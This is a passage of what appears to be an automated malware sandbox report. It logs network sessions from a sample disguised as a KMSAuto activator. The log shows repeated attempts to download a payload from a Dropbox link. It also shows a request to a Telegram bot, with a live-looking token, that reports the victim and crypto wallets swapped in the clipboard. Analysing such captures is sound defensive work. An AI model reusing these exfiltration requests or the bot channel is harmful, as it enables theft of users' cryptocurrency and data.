                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC629INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                                                                                                                                                                                                                Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC1369INData Raw: 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67
                                                                                                                                                                                                                                Data Ascii: dding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; heig
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC1091INData Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e
                                                                                                                                                                                                                                Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.
                                                                                                                                                                                                                                2024-07-06 11:27:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.449758162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:23 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:23 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:23 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 6246558552fc497ea997b7ceeb858b05
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:23 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.449759162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:23 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:24 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:23 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: b02ec5d1db054e08a299c1bb129ccbec
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:24 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.449761162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:24 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:25 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:24 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 3fe90cbb8d934200afd5692c2a9f517e
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:25 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.449763162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:25 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:25 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:25 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 5ac34c91208a4ed68d1539c76461bd4d
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:25 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.449765162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:25 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:26 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:26 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 19257cddd1964a18937af02c4451b113
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:26 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.2.449768162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:27 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:28 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:27 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: e45280295d66465c8ce5cde1d8f2f655
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:28 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                12192.168.2.449767149.154.167.2204437324C:\ProgramData\KMSAuto\accc.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:27 UTC1275OUTGET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D [TRUNCATED]
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:27:27 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:27 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 1361
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                2024-07-06 11:27:27 UTC1361INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 30 32 36 35 32 34 37 2c 22 74 65 78 74 22
                                                                                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":26307,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265247,"text"


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                13192.168.2.449771162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:29 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:29 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:29 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 7844d9b610e94b3e9958b7e12e5481b1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:27:29 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                14192.168.2.449774162.125.66.154437244C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:27:30 UTC83OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                2024-07-06 11:27:30 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:30 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
